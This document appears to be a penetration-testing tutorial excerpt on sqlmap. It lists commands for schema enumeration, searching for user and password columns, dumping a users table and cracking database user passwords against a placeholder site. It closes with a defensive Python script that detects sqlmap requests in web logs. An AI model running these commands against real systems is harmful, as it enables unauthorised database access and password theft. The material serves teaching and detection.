DB Schema Enumeration
sqlmap -u "http://www.example.com/?id=1" --schema
Searching for Data
When dealing with complex database structures with numerous tables and columns, we can search for databases, tables, and columns of interest, by using the --search option. This option enables us to search for identifier names by using the LIKE operator. For example, if we are looking for all of the table names containing the keyword user, we can run SQLMap as follows:
sqlmap -u "http://www.example.com/?id=1" --search -T user
We could also have tried to search for all column names based on a specific keyword (e.g. pass):
sqlmap -u "http://www.example.com/?id=1" --search -C pass
Password Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users
DB Users Password Enumeration and Cracking
SQLMap has a special switch --passwords designed especially for such a task:
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
The --all switch, in combination with the --batch switch, will automa(g)ically do the whole enumeration process on the target itself and provide the entire enumeration details.
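A defender-side check for the --search behaviour described under Searching for Data, as an added example (not part of the original page or of sqlmap): it scans web access log lines for identifier searches against the database catalog using LIKE. The log lines are constructed, the function names are hypothetical, and the payload rule assumes a back end that exposes information_schema.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [10/Oct/2024:13:56:07 +0000] "GET /?id=1%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_name%20LIKE%20%27%25user%25%27 HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2024:13:57:10 +0000] "GET /search?q=things+I+like HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
]

# client IP, request target and User-Agent from a combined-format line
LINE_RE = re.compile(
    r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$'
)
CATALOG = re.compile(r"\binformation_schema\b", re.I)  # assumed catalog name
LIKE_OP = re.compile(r"\blike\b", re.I)


def classify(line):
    """Return (ip, reasons) for a suspicious line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    # Decode the query string so %20 / %27 encoded payloads are matched.
    query = unquote_plus(urlsplit(target).query)
    reasons = []
    # sqlmap identifies itself unless the operator overrides the header,
    # so this is a cheap signal but not a sufficient one.
    if agent.lower().startswith("sqlmap/"):
        reasons.append("default sqlmap User-Agent")
    # LIKE alone is ordinary English ("things I like"); require the
    # catalog reference as well to keep false positives down.
    if CATALOG.search(query) and LIKE_OP.search(query):
        reasons.append("catalog search with LIKE")
    return (ip, reasons) if reasons else None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "; ".join(reasons))
```

The payload rule only sees what reaches the access log, so parameters sent in a POST body need the same check applied at the WAF or application layer.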